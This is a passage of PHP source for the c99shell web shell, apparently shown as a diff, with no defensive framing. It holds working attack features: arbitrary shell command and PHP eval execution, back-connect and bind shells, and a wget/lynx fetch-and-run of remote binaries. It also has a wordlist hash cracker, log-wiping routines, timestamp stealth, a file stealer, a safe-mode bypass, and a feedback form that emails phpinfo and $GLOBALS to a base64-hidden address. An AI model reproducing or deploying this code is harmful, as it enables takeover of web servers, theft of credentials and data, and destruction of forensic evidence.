    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} + if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} + if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); + } + else + { +exec('systeminfo', $wininfo); +?> +
    DOS command: systeminfo
    + +Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,'w')) {echo 'Make File "'.htmlspecialchars($mkfile).'": access denied';} + else {$act = 'f'; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = 'ls';} +} +if ($act == 'encoder') +{ + echo "
    Encoder:
    Input:




    Hashes:
    "; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
    "; + } + echo "
    Url:

    urlencode - +
    urldecode - +
    Base64:
    base64_encode -
    "; + echo "
    base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "

    Base convertations:
    dec2hex -
    "; + +?> +
    +

    + + + +
    +
    Search milw0rm for MD5 hash
    +
    +
    Search md5encryption.com for MD5 or SHA1 hash
    +
    +
    Search CsTeam for MD5 hash
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +Wordlist Hash Cracker

    +
    + + +Enter hash: +
    +Wordlist: +
    +Type: +
    +
    +'; + if ($hash == $type(rtrim($word))) { + echo 'Great success! The password is: '.$word.'
    '; + exit; + } + ++$count; + } +} + +} +if ($act == 'fsbuff') +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

    ";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + } + else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";} +} +if ($act == "search") +{ + echo "Search in file-system:
    "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "
    + +Search for (file/folder name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == 'ls') {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == 'chmod') +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == 'md5file') { +?> +
    MD5 Checksum:

    + +'; +echo "
    '.md5_file($v).''.$v.'

    "; + $act = 'ls'; +} +if ($act == 'sha1file') { +?> +
    SHA1 Checksum:

    + +'; +echo "
    '.sha1_file($v).''.$v.'

    "; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i])."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode("",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo ""; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "
    "; + $act = 'ls'; +} +if ($act == 'delete') +{ + $delerr = ''; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) + $delerr .= 'Can\'t delete '.htmlspecialchars($v).'
    '; + } + if (!empty($delerr)) + echo 'Deleting with errors:
    '.$delerr; + $act = 'ls'; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } +} +// the wipe logs stuff needs to be before cmd, because it will change the $act if the write is successful +if ($act == 'miglc' || $act == 'zap2') { // *nix cleaners + if (is_writable('.')) { + cf($act, $$act); // 'tis pure innovation of optimization :) + $cmd = './'.$act; // keep this before $act = 'cmd'; + $act = 'cmd'; + $cmd_txt = '1'; + }else{ + echo 'Directory Is Not Writable!
    '; + } +} +if ($act == 'clearlogs') { // windows cleaners + if (is_writable('.')) { + cf($act.'.exe', $$act); + $cmd = $act.'.exe'; + $act = 'cmd'; + $cmd_txt = '1'; + }else{ + echo 'Directory Is Not Writable!
    '; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "Result of execution this command:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +} +if ($act == 'ls') +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
    ";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = 'Name'; + $row[] = 'Size'; + $row[] = 'Modify'; + if (!$win) + $row[] = 'Owner/Group'; + $row[] = 'Perms'; + $row[] = 'Action'; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = ""; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    '; + $countrows = 0; + foreach($table as $row) + { + if ($countrows & 1) { + echo "\r\n"; + } else { + echo "\r\n"; + } + ++$countrows; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    + +    + "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo "

    '; + } +} +if ($act == 'tools') +{ +?> + + + +
    :: Bind Functions By r57 ::
    +
    +
    +
    +Bind With Backd00r Burner
    + +
    +
    +
    +
    +Back-Connection +

    +
    Host:> Port:
    +Use:
    +First, run NetCat on your computer using 'nc -l -n -v -p '.
    +Then, click "Connect" once the port is listening. +
    +
    + + + + + +
    :: File Stealer Function Ripped From Tontonq's File Stealer ::
    +
    Safe-Mode Bypass +
    + +
    + + + +
    +
    +
    +
    +
    + + Dosyanin Adresi ? =

    +Nereya Kaydolcak? =

    + +
    +
    +
    +Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...
    "; +} +if (!empty($_GET['dolma'])) +{ +$sayko=htmlspecialchars($_GET['dolma']); +if ($sayko == "wgetcan") +{ + +myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + + +} + +else if ($sayko =="freadcan") +{ +dosyayicek($adires,"sayko_bind"); +myshellexec("./sayko_bind"); +} + +else if ($sayko == "lynxcan") +{ +myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + +} + + + + + +} + +if (!empty($_POST['erorr'])) +{ + + + +error_log($_POST['erorr'], 3, "php://".$_POST['nere']); + + + +} + + + + + + + + + +} +if ($act == "processes") +{ + echo "Processes:
    "; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "
    "; + foreach($tab as $i=>$k) + { + echo ""; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + if (!$win) + { + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    "; 
    +   $v = explode("|",$r); 
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

    Display in text-area
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:
